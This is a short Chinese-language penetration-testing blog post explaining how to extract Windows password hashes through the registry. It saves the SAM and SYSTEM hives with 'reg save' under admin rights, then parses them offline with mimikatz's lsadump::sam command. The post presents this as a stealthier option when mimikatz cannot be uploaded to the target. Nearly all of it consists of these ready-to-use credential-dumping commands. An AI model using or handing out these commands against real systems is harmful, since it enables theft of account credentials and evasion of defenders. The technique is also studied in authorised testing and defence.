Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

通过注册表读 Windows Hash 密码

内网渗透 Adminxe 1665℃ 0评论

0x00 前言

在不允许上传或者使用 mimikatz 时,可以通过保存注册表,到本地来读 Windows Hash 密码。这种方法更隐蔽,缺点是要解 Hash。

0x01 操作

管理员权限下执行 cmd:

reg save HKLM\SYSTEM D:\sys.hiv
reg save HKLM\SAM D:\sam.hiv

执行完在 D 盘生成生成两个文件

sys.hivsam.hiv

下载到本地 mimikatz 的目录打开 mimikatz。
利用代码:

lsadump::sam /sam:sam.hiv /system:sys.hiv

转载请注明:Adminxe's Blog » 通过注册表读 Windows Hash 密码

喜欢 (4)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址